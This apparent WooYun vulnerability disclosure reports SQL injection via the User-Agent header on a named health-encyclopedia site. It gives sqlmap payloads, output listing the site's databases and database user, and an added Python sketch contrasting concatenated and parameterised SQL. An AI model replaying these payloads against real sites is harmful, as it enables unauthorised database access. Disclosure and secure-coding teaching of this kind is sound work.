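2015-11-29: Details reported to the vendor; awaiting vendor handling.
2015-12-04: The vendor actively ignored the vulnerability; details disclosed to the public.
As the title says.
http://baike.120ask.com/ (Chinese health encyclopedia)
HTTP header injection. It exists in multiple places, so I won't paste them all one by one. Here is one example: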
GET /art/26394 HTTP/1.1
User-Agent: *
X-Requested-With: XMLHttpRequest
Referer: http://baike.120ask.com
Cookie: CNZZDATA30036369=cnzz_eid%3D1138545182-1448544156-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1448544156; Hm_lvt_df2d59d646ef3ec9cbf82753b6f92840=1448547737; Hm_lpvt_df2d59d646ef3ec9cbf82753b6f92840=1448547737
Host: baike.120ask.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
The User-Agent header is injectable.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: '||(SELECT 'QqFJ' FROM DUAL WHERE 2149=2149 AND MAKE_SET(4313=4313,5395))||'

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: '||(SELECT 'Gsgj' FROM DUAL WHERE 4390=4390 AND (SELECT 4087 FROM(SELECT COUNT(*),CONCAT(0x717a767871,(SELECT (ELT(4087=4087,1))),0x717a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: '||(SELECT 'uEvx' FROM DUAL WHERE 9303=9303 AND (SELECT * FROM (SELECT(SLEEP(5)))fmWF))||'
---
web application technology: Nginx
back-end DBMS: MySQL 5.0
current user: '120_hashtag@%'
current database: 'hashtag'
current user is DBA: False
available databases [3]:
[*] hashtag
[*] information_schema
[*] test
There is too much table data, so I am pasting only part of it.
Severity: No impact, ignored by vendor
Ignored at: 2015-12-04 11:00
Vulnerability Rank: 4 (WooYun rating)
None yet
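The report does not show the server-side code. As an added example (not from the original report or the vendor's code), the sketch below shows how a User-Agent value concatenated into a SQL statement is parsed as SQL, and how a bound parameter stores the same bytes as plain data. The table, the function names, the sample header values, and the use of SQLite in place of MySQL are all assumptions made for illustration.

```python
import sqlite3

# Constructed header values (not taken from the report's traffic).
# PROBE has the same quote-and-concatenate shape as the payloads sqlmap printed,
# but only selects a harmless literal.
PROBE = "'||(SELECT 'evaluated')||'"
APOSTROPHE_UA = "Mozilla/5.0 (O'Brien build)"  # an ordinary UA containing a quote


def make_db():
    """Fresh in-memory database with a hypothetical visit log table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE visit_log (path TEXT, user_agent TEXT)")
    return db


def log_visit_concatenated(db, path, user_agent):
    # Weak form: the header text becomes part of the SQL statement itself.
    sql = ("INSERT INTO visit_log (path, user_agent) "
           "VALUES ('%s', '%s')" % (path, user_agent))
    db.execute(sql)


def log_visit_bound(db, path, user_agent):
    # Corrected form: the statement is fixed; the header is passed as a parameter.
    db.execute("INSERT INTO visit_log (path, user_agent) VALUES (?, ?)",
               (path, user_agent))


def outcomes(user_agent, path="/art/26394"):
    """Log one request both ways and return what each variant left in the table."""
    result = {}
    for name, log in (("concatenated", log_visit_concatenated),
                      ("bound", log_visit_bound)):
        db = make_db()
        try:
            log(db, path, user_agent)
            row = db.execute("SELECT user_agent FROM visit_log").fetchone()
            result[name] = row[0]
        except sqlite3.Error as exc:
            # A quote in the header broke the statement: the visible symptom
            # that error-based detection relies on.
            result[name] = "SQL error: %s" % type(exc).__name__
    return result


if __name__ == "__main__":
    for ua in (PROBE, APOSTROPHE_UA):
        print(repr(ua), "->", outcomes(ua))
```

With the concatenated form, the subquery inside the header is executed and an ordinary apostrophe breaks the statement; with the bound form, both headers are stored byte for byte.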